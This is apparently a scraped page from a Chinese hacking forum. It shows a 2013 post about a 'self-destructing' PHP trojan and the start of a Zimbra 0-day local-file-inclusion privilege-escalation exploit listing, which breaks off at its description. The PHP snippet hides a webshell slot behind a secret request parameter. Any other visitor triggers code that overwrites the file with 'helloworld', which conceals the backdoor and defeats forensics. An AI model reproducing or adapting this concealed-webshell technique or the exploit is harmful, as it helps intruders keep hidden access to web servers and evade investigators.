这种自毁马有木有意义!!一种另类的脚本木马伪装思路……

这种自毁马有木有意义!! juuxdd (["'<$ /_\> & ]) | 2013-12-14 23:46 <? if($_REQUEST["oo000"]==c47d187067c6cf953245f128b5fde62a){ 一句话,或者木马代码! } else{ $url = $_SERVER['PHP_SELF']; $filename = end(explode('/',$url)); $content = 'helloworld'; $fp = fopen ("$filename","w"); if (fwrite ($fp, $content)){ fclose ($fp); die ("error"); } else { fclose ($fp); die ("good"); } exit; } ?> 用ze

Zimbra - 0day exploit / Privilegie escalation via LFI

# Exploit Title: Zimbra 0day exploit / Privilegie escalation via LFI # Date: 06 Dec 2013 # Exploit Author: rubina119 # Contact Email : rubina119[at]gmail.com # Vendor Homepage: http://www.zimbra.com/ # Version: 2009, 2010, 2011, 2012 and early 2013 versions are afected, # Tested on: Centos(x), Ubuntu. # CVE : No CVE, no patch just 0Day # State : Critical # Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip ---------------Description----------------- This script exploits a Local File Inclusion